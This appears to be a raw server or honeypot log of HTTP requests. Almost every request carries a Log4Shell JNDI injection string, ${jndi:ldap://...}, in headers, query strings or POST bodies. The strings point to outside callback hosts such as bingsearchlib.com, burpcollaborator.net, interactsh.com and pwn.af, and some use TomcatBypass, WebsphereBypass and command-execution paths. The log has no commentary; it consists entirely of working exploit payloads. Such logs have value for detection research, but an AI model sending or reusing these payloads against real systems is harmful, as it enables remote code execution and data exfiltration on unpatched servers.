GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://f02536645a47.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Content-Length: 88 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net:80/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://2527ae46a154.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://1fd8e7dfffef.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://4862f1f5c2c8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://82a18741e589.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://3d57b19c7dd3.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://da28f3f294f3.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://9ca55bea831f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://047f1f300c55.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://7312f601ecba.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://688f1d892ac3.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://89f502dbc7e4.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://46d97df39a02.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8b5e31cb04bf.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://424bbd495916.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e57e49354da1.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://6f6aed93cd2f.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://da6d408517b9.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://22524e9c8fbb.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8dbe05af2628.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Connection: close Content-Length: 85 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://64018b38d1bd.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://aa9a6b64c58a.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://40cef4b0858e.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://9cb05af297a8.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 Connection: close Content-Length: 67 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://c6pa9p4pu896aholv1rgcg3kkpayya3kq.interactsh.com/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://34b4742e7dca.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://1d01d1cecd7c.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://dc05762b0bc2.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://876c3c85c4f2.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1337//Basic/Command/nslookup+nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.basic.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1337/Basic/Command/nslookup nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.basic.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1337/Basic/Command/nslookup nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.basic.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://71b4d4928c65.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://fbc8a1502970.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://119b7332016d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f02536645a47.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://023371450809.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://94bb3af838fe.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://c0d5679b49ba.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://e2a70b2215fb.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://f346e3e0baec.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f11b4f9fe04a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://f1d26c045e5d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://badacc6a9ea6.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://91c5e4e1df27.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://23161a68213a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e24fb529157b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://849a606b15ce.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://aa6ac7a969a6.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://38.86.16.147.c6pnncggjk7jk873c9e0cg3zzcoyyyyyn.interactsh.com/999} Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://21010c91173b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://34c20860658b.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://2300703767f7.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3724.8 Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://649cc4144d86.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 Connection: close Content-Length: 84 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://d5c3417d328d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8a796f7b4e31.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://652b376d5234.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://df13796cad52.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://2567c2c73758.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://528f0838ae11.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://f1fab64ed271.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://fbcec65f688f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://55c73f1c7587.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://a33f41daca17.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.websphere.li466-34.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li466-34.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.websphere.li466-34.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.websphere.li466-34.members.linode.com.dns.rce.ee} 1
GET /?q=${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.websphere.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.websphere.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/WebsphereBypass/Dnslog/nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.websphere.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://3258e8677d68.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Content-Length: 87 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net:80/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://f9b543851f1b.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Content-Length: 86 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 ${jndi:ldap://<IP_ADDRESS>.nb2o4s6kv3njtm2yile8nx12ktqoed.burpcollaborator.net:80/aaa} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://765da23c8c3e.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://5799e6d71743.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://36e18fd31a0f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://fbeed47e4434.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://d22485f86152.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://5015222e57dc.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://cf33bef6c22a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://824e2d2c2e86.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://7c3bdfa7e63d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://d65075490d2e.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://eca6e1900645.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://9bf318db60de.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://6f22b0f41706.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://40ad2f4bb07e.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode) ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://c9203f04fd17.bingsearchlib.com:39356/a} 1
GET /$%7Bjndi:ldap://li826-29.members.linode.com.%7D HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Referer: ${jndi:ldap://li826-29.members.linode.com./ref} User-Agent: ${jndi:ldap://li826-29.members.linode.com./ua} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://1d497d924374.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://200e0216df94.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://6cb8a5e9af80.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://d15d803489af.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://5a8acd64bd7b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e8dbd06447c4.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://c17f75217c47.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://539e7bcf42d5.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://5a2b71f87340.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://fb49bb32caca.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://88875217d50a.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://abee06540bfe.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://2aac03639b45.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://2996bc1fcd73.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://6158f89dd8de.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://5ea60116d80e.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://d12436900580.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://092a09045f40.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://ff3de8f7cd0d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://7c35180b275f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://72dcfc1dddc0.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://cac58d0dec7f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://46c70a67acd3.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://beb027d50fec.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://4070ed75d85e.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://76d4d5c312ce.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-A530F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f6a237f9f9c0.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a0e2d4daf724.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://d549b5ea402a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://2fff1c940e94.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://f288dba3b7a9.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.tomcat.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.tomcat.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226Fa8K5hGYSCgXlFFJkpDIlaRW.tomcat.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f204218fc1d8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://67f36c9935fa.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://7648be5f96b7.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://a40d65b21b7f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Encoding: gzip Connection: close User-Agent: ${jndi:ldap://45.155.205.233:1389/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://40b339b6168d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://b17e2c7e5615.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://91fd9fef8958.bingsearchlib.com:39356/a} 1
GET /?test=${jndi:ldap://c6popvdr3jkuh539pas0cg33wheyydnfs.interactsh.com/a} HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close User-Agent: Mozilla ${jndi:ldap://c6popvdr3jkuh539pas0cg33wheyydnfa.interactsh.com/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://5a5091fe2ddf.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://92d27039ede4.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://cb322b88c2ea.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://918d9838c5ca.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://c5eb13fe41b6.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://12ff8f937c9e.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://1f8d1c500125.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://3cbea99275b5.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://c87678766adb.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://544fe6d9675e.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://4f82fd6de455.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://f09fc1554c75.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://10d70081fca0.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://07fa356d28c6.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://9a9140eedd32.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://9b028f49472a.bingsearchlib.com:39356/a} 1
